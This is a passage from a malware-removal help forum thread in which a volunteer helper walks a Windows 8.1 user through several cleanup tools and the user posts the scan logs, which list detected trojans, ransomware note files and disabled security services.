  • When the main screen opens, if the database is out of date, you can click on the Fix Now banner or the Update Now link
  • 2a308da4-c469-4a72-b86c-84c05ca1e6a6_zps
  • Once the program has loaded and updated, select "Scan Now >>" to start the scan.
  • 5f2fe168-2571-4c73-a1e8-945d5aae9e1e_zps
  • The scan may take some time to finish, so please be patient.
  • If any malware is found, make sure that everything is checked, and click Remove Selected.
  • When the scan is complete, click View detailed log >> to view the results.
  • 386d1e7f-0e85-4425-b4dc-fa8ad24a4855_zps
  • The report screen will open
  • a50e2fb7-0c07-4ff6-917c-19e7329dab8a_zps
  • At the bottom click on Export and select as txt file, save the file to your desktop and click OK. When the export is complete, select OPEN.
  • ExportSaved_zpsac3a71eb.png
  • The log file will be opened in your default text file viewer (usually Notepad); select the whole text (Ctrl + A) and copy (Ctrl + c) it to paste here in a reply.
If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts, click OK to either and let MBAM proceed with the disinfection process, if asked to restart the computer, please do so immediately.


Third, a Farbar Services Scan >>>>

This will check on the essential OS services and see if there are any that need to be reset.

Please download Farbar Service Scanner to your desktop and double click on the file to run it.
  • Make sure the following options are checked:
    • Internet Services
    • Windows Firewall
    • System Restore
    • Security Center
    • Windows Update
    • Windows Defender
    • Other Services
  • Press "Scan".
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log to your reply.
Information to Reply with >>>>
  • The AdwCleaner[S#].txt log file.
  • The MBAM scan log.
  • The FSS.txt log file.

  • 0

#8
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

It seemed to me that ADWCleaner didn't find anything, here's the log

 

# AdwCleaner v4.111 - Logfile created 25/02/2015 at 01:51:15
# Updated 18/02/2015 by Xplode
# Database : 2015-02-18.3 [Server]
# Operating system : Windows 8.1  (x64)
# Username : Dorothy01 - DOROTHY
# Running from : C:\Users\Dorothy01\Desktop\AdwCleaner.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
 
***** [ Web browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17126
 
 
-\\ Google Chrome v40.0.2214.115
 
 
*************************
 
AdwCleaner[R0].txt - [2576 bytes] - [19/02/2015 21:33:55]
AdwCleaner[R1].txt - [1712 bytes] - [20/02/2015 06:29:39]
AdwCleaner[R2].txt - [962 bytes] - [25/02/2015 01:45:08]
AdwCleaner[S0].txt - [2496 bytes] - [19/02/2015 21:38:33]
AdwCleaner[S1].txt - [1792 bytes] - [20/02/2015 06:33:36]
AdwCleaner[S2].txt - [890 bytes] - [25/02/2015 01:51:15]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S2].txt - [948  bytes] ##########
 
 
 
Now Malwarebytes did and after the reboot, the system does seem much much faster, here's the log for that scan.
 
Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 2/25/2015
Scan Time: 1:58:36 AM
Logfile: 
Administrator: Yes
 
Version: 2.00.4.1028
Malware Database: v2015.02.25.03
Rootkit Database: v2015.02.22.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows 8.1
CPU: x64
File System: NTFS
User: Dorothy01
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 342048
Time Elapsed: 38 min, 35 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 1
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll, Delete-on-Reboot, [eeb98a983c4e51e598db52d40200926e], 
 
Registry Keys: 2
Trojan.Bunitu, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\kycnage, Quarantined, [0e99fa284446f244acbc615fb0553fc1], 
Trojan.FakeMS.SVSGen2, HKLM\SOFTWARE\CLASSES\CLSID\{2D349E57-23E4-4A67-9624-F1DC6B65AABF}, Quarantined, [347327fb107a94a289eaa2f152af3fc1], 
 
Registry Values: 1
Trojan.Bunitu, HKU\S-1-5-21-1427692388-1042374531-2795145444-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|kycnage, rundll32 "C:\Users\Dorothy01\AppData\Local\kycnage.dll",kycnage, Quarantined, [0e99fa284446f244acbc615fb0553fc1]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 24
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Roaming\BtvStack.dll, Delete-on-Reboot, [eeb98a983c4e51e598db52d40200926e], 
Trojan.Bunitu, C:\Users\Dorothy01\AppData\Local\kycnage.dll, Quarantined, [0e99fa284446f244acbc615fb0553fc1], 
Trojan.FakeMS.SVSGen2, C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}\appmgr.dll, Delete-on-Reboot, [347327fb107a94a289eaa2f152af3fc1], 
Trojan.Crypt, C:\Users\Dorothy01\AppData\Local\Temp\~00F12F87.tmp, Quarantined, [278042e0513987af9437e5ddb451d12f], 
Trojan.Agent.B47Gen, C:\Users\Dorothy01\AppData\Local\Temp\C84A.tmp, Quarantined, [901727fb385274c2f2d65bcdc73bce32], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\1663.tmp, Quarantined, [4d5a849ebbcf2e08fc2a62c5758d3ac6], 
Trojan.Krypt, C:\Users\Dorothy01\AppData\Local\Temp\8D2A.tmp, Quarantined, [b8eff2308703e254fd838f99a959b848], 
Trojan.Agent.ED, C:\Users\Dorothy01\AppData\Local\Temp\3E65.tmp, Quarantined, [f1b665bd90fa39fd5895ef3727db9c64], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\6579.tmp, Quarantined, [adfa2ef4a5e5d462f2f0be4fad55936d], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\EFF2.tmp, Quarantined, [d4d3d44e5f2b60d635ad7895b64c4fb1], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\F727.tmp, Quarantined, [6245ca58cebc79bd23bf60ad7b871ee2], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\5157.tmp, Quarantined, [87202bf7553540f69a48937ab54d2cd4], 
Trojan.Agent.FSAVXGen, C:\Users\Dorothy01\AppData\Local\Temp\FE3C.tmp, Quarantined, [f2b569b96d1d171f5420cbd78f72a957], 
Trojan.Agent.ED, C:\Users\Dorothy01\AppData\Local\Temp\5774.tmp, Quarantined, [c3e446dc3654e35346c373b24ab89868], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\5C28.tmp, Quarantined, [93148c9696f4181e1c5748ded32f827e], 
Trojan.FakeMS, C:\Users\Dorothy01\AppData\Local\Temp\7A25.tmp, Quarantined, [1691fb27c0ca6cca9013f13449b911ef], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\44BF.tmp, Quarantined, [3f68a97999f1e05626adbf6705fd54ac], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\6E34.tmp, Quarantined, [10970220e6a472c48062c845c042c23e], 
Trojan.FakeMS.ED, C:\Users\Dorothy01\AppData\Local\Temp\7223.tmp, Quarantined, [e7c080a22c5e2d091b398b9b0200728e], 
Trojan.Agent.FSAVXGen, C:\Users\Dorothy01\AppData\Local\Temp\9549.tmp, Quarantined, [94133de517734aecdb999b07ce33d828], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\6ADE.tmp, Quarantined, [565157cb0585ce688d551eef946e12ee], 
Trojan.Agent.0BGen2, C:\Users\Dorothy01\AppData\Local\Temp\D4F6.tmp, Quarantined, [377034ee1f6bd561e6fcb85535cd6d93], 
Trojan.Ransom.ED, C:\Windows\Installer\{4D0AE95F-8433-47D9-B1BA-3F7757741FBD}\api-ms-win-system-FntCache-l1-1-0.dll, Quarantined, [446374ae5139b086ecf00026a65cf50b], 
Trojan.Inject.ED, C:\Windows\Installer\{4E61FB7C-E89A-4510-ADC1-B38572ADB03D}\msiexec.exe, Quarantined, [bfe8948ed9b1fd3928dd02e95da46e92], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
And here is the FSS Scan
 
Farbar Service Scanner Version: 17-01-2015
Ran by Dorothy01 (administrator) on 25-02-2015 at 02:49:01
Running from "C:\Users\Dorothy01\Desktop"
Microsoft Windows 8.1  (X64)
Boot Mode: Normal
****************************************************************
 
Internet Services:
============
 
Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.
 
 
Windows Firewall:
=============
 
Firewall Disabled Policy: 
==================
 
 
System Restore:
============
 
System Restore Policy: 
========================
 
 
Action Center:
============
 
wscsvc Service is not running. Checking service configuration:
The start type of wscsvc service is set to Disabled. The default start type is Auto.
The ImagePath of wscsvc service is OK.
The ServiceDll of wscsvc service is OK.
 
 
Windows Update:
============
wuauserv Service is not running. Checking service configuration:
The start type of wuauserv service is set to Disabled. The default start type is Auto.
The ImagePath of wuauserv service is OK.
The ServiceDll of wuauserv service is OK.
 
BITS Service is not running. Checking service configuration:
The start type of BITS service is set to Disabled. The default start type is Auto.
The ImagePath of BITS service is OK.
The ServiceDll of BITS service is OK.
 
 
Windows Autoupdate Disabled Policy: 
============================
 
 
Windows Defender:
==============
WinDefend Service is not running. Checking service configuration:
The start type of WinDefend service is set to Demand. The default start type is Auto.
The ImagePath of WinDefend: ""%ProgramFiles%\Windows Defender\MsMpEng.exe"".
 
 
Windows Defender Disabled Policy: 
==========================
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender]
"DisableAntiSpyware"=DWORD:1
 
 
Other Services:
==============
 
 
File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MsMpEng.exe => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
 
 
**** End of log ****

  • 0

#9
dbreeze

dbreeze

    Trusted Helper

  • Malware Removal
  • 2,213 posts

Ok; let's get the services back to running properly and then on to the last scan.
 
First, reset OS services to default values.
 
Download Tweaking.com's Set Windows Services to Default Startups.
 
Double click on the file to start the extraction of the executable files.  Click Yes to the User Account Control (if it opens) to start the program.  Click the Start button on the program and allow the program to apply the needed changes.  If all goes well, it should just apply the changes and then show you the status of the changes in the main window of the program.
 
Once it is finished, please restart your system to have all the changes take affect.
 
Second, a ESET Online Scanner look at the system
 

ESET Online Scanner:

Note: You will need to disable your current installed Anti-Virus for the duration of the online scan, how to do so can be read here. Also, please note that this scan can take a while to run.

  • Please go here to run the scan and click on Run ESET Online Scanner
  • abfacb96-0c99-4b59-b9e9-9298aa0ee3ec_zps
  • The next screen will be the ESET Online Scanner installer
  • Getinstallerpopup_zps569f8772.png
  • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer and select Save File
  • downloadsave_zpsb758563f.png
  • Save the file to your desktop; you should see a file like this when the download is finished
  • desktopfile_zps98a1ee89.png Double click on this to start the installation of the ESET Online Scanner
  • In the new window that appears select the option YES, I accept the Terms of Use then click on Start
  • TOU_zps4ecd3406.png
  • Now in the Computer scan settings window that appears:-
  • Make sure that the option Enable detection of potentially unwanted applications is selected.
  • Now click on Advanced Settings and configure the options as follows:
    • Remove found threats is Not checked
    • Scan archives is checked
    • Scan for potentially unsafe applications is checked
    • Enable Anti-Stealth Technology is checked
  • Now click on: Start
  • Loadsettings_2014-08-23_zps3f2d0c88.png
  • The virus signature database... will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
  • Downloadingsignatures_zps36c38587.png
  • When completed the Online Scan will begin automatically.
  • Scanningdisplay_zpsec3aac14.png
  • Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
  • When completed, if any malware was detected, the summary screen will show a warning.
  • Threatsfound_zpsfe95fb4e.png
  • On the Scan results detail window, select to Export to text file, name the file ESET scan results.txt and save it to your desktop.
  • Exporttotextfile_zps16cb487f.png
  • Click <<Back once the file is saved, select 'Uninstall application on close' and click on Finish.
  • UninstallcheckedandFinish_zps6fb26ad8.pn
  • Use Notepad to open the logfile you save on your desktop.
  • Copy and paste that log as a reply to this topic.

Note: Do not forget to re-enable your Anti-Virus application after running the above scan!


  • 0

#10
allforhimblog

allforhimblog

    Member

  • Topic Starter
  • Member
  • PipPip
  • 98 posts

Okay, I tried multiple times to run the eset scanner and each time it would hang at a different spot.  This is the as far as I got, 49%.  I on a bright note, I can update windows again, so woooo!!!

 

 

 

C:\FRST\Quarantine\C\ProgramData\bamgaq\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\ProgramData\bamgaq\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\ProgramData\PenulErhig\EuyogZifji.lxo a variant of Win32/Kryptik.CZEF trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\pckunie.dll.xBAD a variant of Win32/TrojanProxy.Agent.NYT trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\pgkunge.dll.xBAD a variant of Win32/TrojanProxy.Agent.NYT trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Local\Temp\getmhost.exe.xBAD a variant of Win32/Kryptik.CZFP trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\DECRYPT_INSTRUCTION.TXT.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\Desktop\HELP_DECRYPT.HTML.xBAD Win32/Filecoder.CR trojan
C:\FRST\Quarantine\C\Users\Dorothy01\Desktop\HELP_DECRYPT.TXT.xBAD Win32/Filecoder.CR trojan
C:\ProgramData\RogueKiller\Quarantine\0094F143FFE16510.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\24E53487FEB8DA78.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\81438BB61F59B727.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\BE8834083A072530.reg REG/Agent.AK trojan
C:\ProgramData\RogueKiller\Quarantine\D30EEB58F2B5284C.reg REG/Agent.AK trojan
C:\System Volume Information\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan
C:\System Volume Information\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan
C:\System Volume Information\EfaData\HELP_DECRYPT.HTML Win32/Filecoder.CR trojan
C:\System Volume Information\EfaData\HELP_DECRYPT.TXT Win32/Filecoder.CR trojan
C:\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\BE8834083A072530.reg REG/Agent.AK trojan
C:\Users\All Users\RogueKiller\Quarantine\D30EEB58F2B5284C.reg REG/Agent.AK trojan
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\AMD\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\AMD\Fuel\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Apple Computer\iTunes\iAd\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Macromedia\Flash Player\FlashPlayerUpdateService.exe Win32/Agent.WSE trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\CLR_v4.0_32\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\6F2HFX6I.htm Win32/Injector.BUXY trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\F80C8YK2.htm a variant of Win32/Kryptik.CZER trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\ILESJKL3.htm a variant of Win32/Kryptik.CZER trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\LDE4QFIB\K0KQ6VJD.htm Win32/Redyms.AL trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\N6C9B6FT.htm a variant of Win32/Injector.BVFY trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\PICRTI7N.htm Win32/Redyms.AM trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\PI91BGI7\TE1HBMFT.htm a variant of Win32/Kryptik.CZNJ trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\G8HIT1UX.htm a variant of Win32/Kryptik.CZFP trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\MGN8REVU.htm a variant of Win32/Kryptik.CZJX trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\R1QO5JP1.htm a variant of Win32/Kryptik.CZJX trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows\INetCache\IE\SISCQQIZ\YISNRMU8.htm Win32/Simda.B trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Microsoft\Windows Mail\Stationery\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Local\Temp\D163.tmp Win32/Redyms.AM trojan
C:\Users\Dorothy01\AppData\Local\Temp\~009CE97E.tmp a variant of Win32/Kryptik.CZEF trojan
C:\Users\Dorothy01\AppData\Local\Temp\41c\AppData\Local\Microsoft\Windows\INetCache\IE\1C1SW3MG\82123fbcab77830f3af0dcbe5208a3d5[1].htm JS/Exploit.Agent.NIX trojan
C:\Users\Dorothy01\AppData\Local\Temp\c4\AppData\Local\Microsoft\Windows\INetCache\IE\C7ZS5GJ0\a780b2c52f7951abae3fde16fd81989d[1].htm JS/Exploit.Agent.NIX trojan
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631.exe a variant of Win32/AdWare.PennyBee.A application
C:\Users\Dorothy01\AppData\Local\tmp11238\dag1631tmp.exe a variant of Win32/AdWare.PennyBee.A application
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\LocalLow\Sun\Java\Deployment\SystemCache\6.0\32\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Adobe\Flash Player\AssetCache\BAZ5TK72\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Connected Remote\data\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\AppData\Roaming\Hewlett-Packard\HP Setup\Metrics\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Dorothy01\Music\iTunes\iTunes Media\Music\Unknown Artist\Unknown Album\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Public\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Public\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Users\Public\CyberLink\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Windows\Installer\dfb9a6.msi a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application
C:\Windows.old\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan
C:\Windows.old\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\0094F143FFE16510.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\24E53487FEB8DA78.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\7C9DEC56C370BF3C.reg REG/Agent.AK trojan
C:\Windows.old\Users\All Users\RogueKiller\Quarantine\81438BB61F59B727.reg REG/Agent.AK trojan
